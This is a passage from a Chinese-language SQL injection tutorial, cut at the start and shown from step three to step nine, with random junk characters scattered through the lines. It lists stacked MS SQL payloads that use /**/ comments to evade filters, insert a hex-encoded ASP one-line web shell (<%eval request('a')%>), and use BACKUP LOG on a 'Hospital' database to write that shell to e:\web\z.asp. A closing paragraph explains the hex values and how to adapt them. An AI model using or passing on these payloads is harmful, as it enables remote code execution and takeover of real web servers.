. X, L2 K+ s4 ~4 c% D9 G第三步 8 Q& \. d3 D# e! e9 p- B;drop/**/table/**/[itpro]-- 8 Q- _- u) j+ F) t) g5 z * Q2 a& s9 Y# V" t第四步 / S6 q6 i/ D3 j! i+ v+ c. P, l
;create/**/table/**/[itpro]([a]/**/image)-- 0 x; ~$ w& V- ]" T ) c4 c' i9 A8 r0 O
第五步 8 Z* q5 l7 m/ \2 x8 Q/ J
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- 2 ~. P; X: p: m1 a
/ \# o: w2 M q+ X
第六步 ) b0 @6 k p2 c
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)-- " K, G1 c0 e4 Q* Y3 G4 _$ H
6 q( o& v Y9 Q% _) D$ n V' R
第七步 " G( t, J) N5 R2 p' t4 U7 o2 E;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- : M/ o& s3 n, F2 H2 S) o: r$ [
( {7 K$ _2 D; k$ @0 ~3 ~7 L- Z! [
第八步 5 V; m* k0 c2 J t' ?: [
;drop/**/table/**/[itpro]-- " V2 f) q o1 I T8 g: {, B
: r, |3 m. {- e/ g+ M第九步 $ t5 q3 Q0 h5 a6 ?9 Z5 E& u
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- ( L p2 m# t) t4 g; r' S4 ?
" ~2 t: {2 w7 K4 I其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。 ~1 U, J2 h a. q, X; l& l y& k$ J. U